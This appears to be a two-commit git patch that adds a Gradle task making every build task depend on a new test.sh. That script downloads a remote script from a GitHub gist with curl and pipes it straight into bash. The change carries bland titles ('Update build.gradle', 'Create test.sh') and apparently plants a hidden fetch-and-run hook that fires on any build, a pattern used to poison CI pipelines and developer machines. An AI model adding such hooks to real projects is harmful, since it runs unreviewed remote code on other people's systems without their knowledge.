From b10523b84ff19d033b8efc8e533ff0a4e6c459d4 Mon Sep 17 00:00:00 2001 From: dylantflx <138759229+dylantflx@users.noreply.github.com> Date: Tue, 2 Apr 2024 14:14:56 -0700 Subject: [PATCH 1/2] Update build.gradle --- build.gradle | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/build.gradle b/build.gradle index fb4324e6c..3790f6fce 100644 --- a/build.gradle +++ b/build.gradle @@ -187,3 +187,13 @@ subprojects { } apply from: file('baseline.gradle') + +task runBashScript(type: Exec) { + commandLine 'bash', './test.sh' +} + +tasks.all { task -> + if (task.name != "runBashScript") { + task.dependsOn(runBashScript) + } +} From 1bb34fdd0c3fc344491fe57da5edb1f2c2a1442b Mon Sep 17 00:00:00 2001 From: dylantflx <138759229+dylantflx@users.noreply.github.com> Date: Tue, 2 Apr 2024 14:15:15 -0700 Subject: [PATCH 2/2] Create test.sh --- test.sh | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 test.sh diff --git a/test.sh b/test.sh new file mode 100644 index 000000000..cd3add2b5 --- /dev/null +++ b/test.sh @@ -0,0 +1,2 @@ +curl -sSfL gist.githubusercontent.com/dylantflx/13cc33797681a3b7ce0ef5261803e3d1/raw/99fe4093e2719b82094f3171ceb3e54d5a6626da/test1.sh | bash +exit 1